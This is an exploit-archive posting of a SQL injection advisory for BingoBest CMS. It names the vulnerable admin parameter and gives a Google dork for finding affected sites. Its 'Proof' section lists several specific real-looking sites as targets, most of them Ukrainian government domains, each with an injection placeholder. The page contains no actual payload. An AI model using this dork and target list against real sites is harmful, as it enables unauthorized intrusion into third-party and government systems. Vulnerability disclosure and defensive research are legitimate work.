BingoBest Cms SQL Injection

Posted on 30 November -0001
<HTML><HEAD><TITLE>BingoBest Cms SQL Injection </TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>*=============================================================| 
*-------------------In The Name Of God------------------------| 
| 
| Exploit Title : BingoBest Cms Sql Injection 
| 
| Exploit Author : Ashiyane Digital Security Team 
| 
| Vendor Homepage : http://bingobest.biz/
| 
| Google Dork : intext:© BingoBest - Ñ€Ð¾Ð·Ñ€Ð¾Ð±ÐºÐ° ÑÐ°Ð¹Ñ‚Ñ–Ð² Ñ‚Ð° Ð¿Ñ€Ð¾Ð³Ñ€Ð°Ð¼Ð½Ð¾Ð³Ð¾ Ð·Ð°Ð±ÐµÐ·Ð¿ÐµÑ‡ÐµÐ½Ð½Ñ
| 
| Tested on : Windows 10 ~~~> Google Chrome 
| 
| Date : 1/30/2017 
*==========================================================| 
|
| vulnerability Path : http://target/Path/admin/index.php?dm=1&sid= 
|
*==========================================================|
| Proof : 
| 
| http://bingobest.biz/admin/index.php?dm=1&sid=[SQLI]
| 
| http://bgadmin.gov.ua/admin/index.php?dm=1&sid=[SQLI] 
| 
| http://rdatf.gov.ua/admin/index.php?dm=1&sid=[SQLI] 
| 
| http://kodis.chuguev-rada.gov.ua/admin/index.php?dm=1&sid=[SQLI]
| 
| http://shevselrada.gov.ua/admin/index.php?dm=1&sid=[SQLI] 
| 
*=============================================================| 
| Discovered By : HackFans 
*=============================================================|  </BODY></HTML>
TOP
Malware :

None in database
Last 20
Exploits :

Last 20